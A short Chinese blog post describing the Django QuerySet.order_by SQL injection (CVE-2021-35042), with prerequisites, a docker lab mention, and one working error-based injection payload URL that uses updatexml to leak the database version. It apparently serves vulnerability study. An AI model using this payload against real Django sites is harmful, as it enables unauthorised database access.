漏洞描述
Django 于 2021年7月1日发布了一个安全更新,修复了函数QuerySet.order_by中的 SQL 注入漏洞。
参考链接:
该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。
漏洞环境及利用
搭建docker环境
payload
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23
Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)
blackK_YC2023-11-26 19:09
相关推荐
前进的李工9 小时前
MySQL大小写规则与存储引擎详解014-code11 小时前
MySQL 常用业务 SQL前进的李工13 小时前
MySQL用户管理与权限控制指南(含底层架构说明)瀚高PG实验室14 小时前
HGDB 4.5.8.8开启oracle兼容执行带聚合函数的SQL导致数据库进程被信号11杀死向上的车轮15 小时前
如何用DeepSeek定制大模型——智能Text-to-SQL专家系统DROm RAPS15 小时前
SQL中如何添加数据lzhdim15 小时前
SQL 入门 9:SQL 高级子查询:ANY、EXISTS 与多位置应用电商API&Tina17 小时前
跨境电商如何接入1688官方寻源通接口?附接入流程PawSQL18 小时前
PawSQL平台功能月度更新 | 2026年2月夕除18 小时前
MVN--06